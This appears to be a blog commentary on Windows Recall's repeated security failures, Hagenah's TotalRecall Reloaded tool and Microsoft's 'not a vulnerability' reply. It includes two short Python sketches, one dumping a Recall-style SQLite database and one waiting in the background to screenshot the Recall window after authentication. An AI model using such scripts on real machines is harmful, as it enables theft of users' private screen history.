The Zombie That Won't Stay Dead

Microsoft rebuilt Windows Recall from scratch. A researcher broke it again. Microsoft's response: that's not a vulnerability.
Part of the ongoing Big Tech's War on Users series.

You remember Recall.

Microsoft announced it in May 2024 as the flagship feature of their new Copilot+ AI PCs. It would take continuous screenshots of everything you do on your computer, index them, and let you search back through your own activity like a personal time machine. Browse to a website, read an email, open a document — Recall sees it, stores it, and makes it searchable.

The security community noticed immediately what that implied. A single AI-powered dragnet sitting on your machine, screenshot by screenshot, accumulating every password field, bank statement, private message, and confidential document that crossed your screen — stored locally, but accessible. Security researcher Kevin Beaumont coined a phrase for what a malware author could do with it: infostealer paradise.

And it would be doing all of this continuously, in the background, while you were trying to use your computer for something else. The Copilot+ hardware requirement — the dedicated NPU that made the new PCs more expensive — exists in part so this process doesn't grind your system to a halt. Microsoft needed new silicon to run the surveillance efficiently. The surveillance was the feature.

Recall wasn't the only reason for the NPU mandate, to be fair. The broader pitch was Copilot everywhere — shoved into Word, Excel, Outlook, Teams, Paint, Notepad. Notepad. Microsoft found a way to make a text editor that's been shipping since 1985 feel like it needed an AI co-pilot. The NPU was the hardware foundation for that whole strategy, and Recall was the flagship demo that made it tangible at a keynote.

That strategy has since shown some cracks. Microsoft has been walking parts of it back — less Copilot in places it had no business being, some movement toward consolidated settings for it. Pavan Davuluri's "we hear you" post in March was as close to an admission as you usually get from a company this size. I wrote about what that actually means a few weeks ago. The short version: the leopard does not change its spots. It maybe hides a few of them temporarily when the user backlash is loud enough.

Recall never made it into that rollback conversation. It kept quietly moving forward.

Back up to that first version. Microsoft pulled it before it ever shipped, in part because researchers had already walked straight in and helped themselves. The original stored everything in an unencrypted SQLite database with no meaningful access controls. Security researcher Alexander Hagenah's first tool, the original TotalRecall, could copy a full day's worth of data in about two seconds. No exploit. No elevated permissions. No particular skill required. Just point the tool at the database and watch your entire digital life come out the other end.

It wasn't a sophisticated attack. It was a screen door.
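For a sense of how low that bar was, here's a minimal sketch of the class of thing the original tool did. This is not TotalRecall's actual code, and the database path is a placeholder rather than the real Recall location; the point is that an unencrypted SQLite file needs nothing more than the standard library to empty out.

```python
import sqlite3

# Placeholder path -- the real Recall database location isn't reproduced here.
DB_PATH = r"C:\Users\you\AppData\Local\example\recall.db"

con = sqlite3.connect(DB_PATH)

# Enumerate every table in the file, then dump a sample of each one.
# No exploit, no elevated permissions: if you can read the file, you have it all.
tables = [row[0] for row in con.execute(
    "SELECT name FROM sqlite_master WHERE type='table'")]

for table in tables:
    print(f"--- {table} ---")
    for row in con.execute(f'SELECT * FROM "{table}" LIMIT 10'):
        print(row)

con.close()
```

That's roughly the entire skill ceiling the original design demanded of an attacker.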

To be clear, this isn't a problem with the concept in the abstract. Enterprise security tools — Teramind, Veriato, Proofpoint — have been doing screenshot capture, OCR, and full activity recording for years. Legally, with consent, with defined retention policies, with role-based access controls, and with audit trails built for HIPAA and SOX compliance. The data doesn't sit in an unprotected file on the user's own machine. There's a managed backend, an IT team, and a governance framework. The capability exists, and it can be implemented responsibly. Microsoft's problem was trying to ship a consumer version of it with none of those guardrails, baked into the OS as an opt-out feature, and calling it a personal AI assistant.

The concept isn't the boneheaded part. The implementation and the approach are the boneheaded part.

Microsoft went back to the drawing board. Promised a redesigned security model. Rolled it out quietly to Windows Insiders early last year.

It has now been broken again.

Hagenah, the same researcher who broke the original, has published a new tool called TotalRecall Reloaded. The mechanism is straightforward and, once you hear it, hard to unsee.

Recall's data lives in what Microsoft calls a VBS Enclave. A locked box. You authenticate through Windows Hello — biometrics, PIN — and the box opens to show you your timeline. Microsoft specifically designed this to prevent malware from riding along with that authentication and stealing the contents.

Hagenah's tool rides along anyway.

It sits quietly in the background. It waits. When you open Recall and authenticate through Windows Hello, TotalRecall Reloaded is there. And when the vault opens, it takes everything.
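To make "rides along" concrete: anything already running in the user's session can simply wait for that moment. The sketch below is a conceptual illustration, not Hagenah's actual technique or code. It just polls for a visible window with "Recall" in its title and screenshots it, which is enough to show the shape of the problem: once the decrypted timeline is rendered, it is within reach of any ordinary process in the session. It assumes pywin32 and Pillow on Windows, and the window-title check is a guess made for illustration.

```python
import time

import win32gui            # pip install pywin32
from PIL import ImageGrab  # pip install Pillow

def find_recall_window():
    """Return a handle to any visible top-level window with 'Recall' in its title."""
    hits = []
    def check(hwnd, _):
        if win32gui.IsWindowVisible(hwnd) and "Recall" in win32gui.GetWindowText(hwnd):
            hits.append(hwnd)
    win32gui.EnumWindows(check, None)
    return hits[0] if hits else None

# Sit in the background and wait. The moment the user authenticates and the
# timeline is drawn on screen, its contents are visible to this process too.
while True:
    hwnd = find_recall_window()
    if hwnd:
        left, top, right, bottom = win32gui.GetWindowRect(hwnd)
        ImageGrab.grab(bbox=(left, top, right, bottom)).save("timeline_capture.png")
        break
    time.sleep(1)
```

Nothing in that sketch touches the enclave, the crypto, or Windows Hello. That's the point Hagenah is making: the vault can be perfect and it doesn't matter.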

Microsoft's response, delivered to The Verge: "after careful investigation, we determined that the access patterns demonstrated are consistent with intended protections and existing controls, and do not represent a bypass of a security boundary."

Not a vulnerability.

There's an old programming adage: if it's documented, it's not a bug, it's a feature. Microsoft published a detailed breakdown of Recall's security model in September 2024. When Hagenah demonstrated that the security model itself was the attack surface, Microsoft had the receipts ready. Working as designed. It's in the blog post.

Here's the part worth sitting with.

Hagenah isn't claiming the vault is weak. He specifically praised the VBS Enclave as "rock solid." The cryptography is fine. The authentication is real. The locked box is, as he put it, a titanium vault door.

The problem is the wall next to it.

"The fundamental problem isn't the crypto, the enclave, the authentication, or the PPL. It's sending decrypted content to an unprotected process for rendering."

Meaning: the vault opens, the decrypted data has to go somewhere for you to actually see it, and that somewhere is not protected. (The PPL he mentions is Protected Process Light, the Windows mechanism meant to shield a sensitive process from tampering; it holds up fine too.) The moment Recall has to show you your own timeline, it has to hand the contents to a process that other things can reach. You can't fix that with better locks. The locks are already titanium. The problem is architectural — it's baked into what Recall is required to do in order to function at all.

Microsoft saying "that's not a vulnerability" is technically defensible and practically meaningless. If the design of the feature creates the attack surface, the design is the vulnerability. Calling it "intended behavior" doesn't make it less exploitable.

This is the zombie risk.

Not that Recall is bad security. Not that Microsoft is being careless. The zombie risk is that some problems don't have patches. You can kill the feature, redesign it, rebuild it, tighten every bolt — and the problem comes back because the problem is structural. Because a feature that records everything you do and makes it searchable will always have to, at some point, show you what it recorded. And the moment it does, that data is exposed.

Every redesign just relocates the drywall.

Recall has been recalled, redesigned, re-launched, and re-broken. The timeline:

  • May 2024: Announced
  • June 2024: Pulled before launch after public outcry
  • September 2024: Redesigned security model published
  • Early 2025: Rolled out to Windows Insiders
  • March 2026: Hagenah responsibly discloses to Microsoft
  • April 2026: Microsoft says it's not a vulnerability
  • April 2026: The rest of us find out anyway

That last step is also worth noting. Hagenah reported this responsibly. He waited. Microsoft reviewed it, decided there was nothing to fix, and closed the ticket. He then published — because what else do you do? — and now it's in the news cycle. The responsible disclosure process worked exactly as designed and produced no change in the product.

The part nobody asked for is also the part worth asking about.

Recall exists because Microsoft needed a reason to sell Copilot+ PCs. They needed a flagship AI feature that made the hardware requirement feel justified. Recall was it — a "wow" demo that made sense in a keynote and fell apart the moment anyone thought about it for thirty seconds. And the keynote pitch was explicit: Copilot could answer questions about your own past activity because it had been watching the whole time. Recall wasn't a standalone feature. It was Copilot's long-term memory layer.

That detail reframes everything about the security architecture. If Recall's data was ever genuinely locked down — sealed, sandboxed, inaccessible to outside processes — Copilot couldn't query it either. You can't build a vault that one specific Microsoft process also has a key to without that key becoming an attack surface. The "secure" version of Recall and the "Copilot can use it" version of Recall were always in direct tension, and Microsoft needed both. So they built the vault and left Copilot's access path in the wall next to it.

Which means "not a vulnerability" isn't just defensiveness. It's almost technically accurate — just not in the way Microsoft wants it to sound. There's no specific flaw to patch here. The design itself is the flaw. A genuine fix would mean rearchitecting the entire data pipeline, which would mean Copilot losing its key, which would mean the feature stops being what they sold at the keynote. That's not a bug report. That's a product decision that got made wrong at the beginning and has been defended ever since.

The enterprise tools that have been doing this for years don't have this problem — and the reason is simple. Teramind, Veriato, Proofpoint: none of them were ever designed to share their data with a general-purpose AI assistant by default. Their entire security model starts from the opposite assumption — this data should be as inaccessible as possible, except to authorized personnel, through a hardened interface, with scoped permissions and a full audit trail of who accessed what and when. Nobody is pitching Teramind as "and then your AI can answer questions about your audit logs." That's not the use case. The use case is the opposite.

Recall was architected to be queryable first and secured second. The enterprise tools were secured first and made queryable only under strict controls. That's not a subtle distinction. That's the whole ballgame.

Nobody asked for a screenshot diary of their entire computing life. Nobody filed a feature request for "store everything I've ever done in a searchable local database and make it available to an AI assistant." The users who want something like this can build it, on their own terms, with tools that were designed with the security model in mind from day one.

Recall keeps coming back for the same reason it keeps getting broken: the business model requires Copilot to have a key, and nobody with the power to change that actually wants to give it up.

Find me on Mastodon at @ppb1701@ppb.social. The thread, as always, keeps not running out.

Part of the ongoing Big Tech's War on Users series.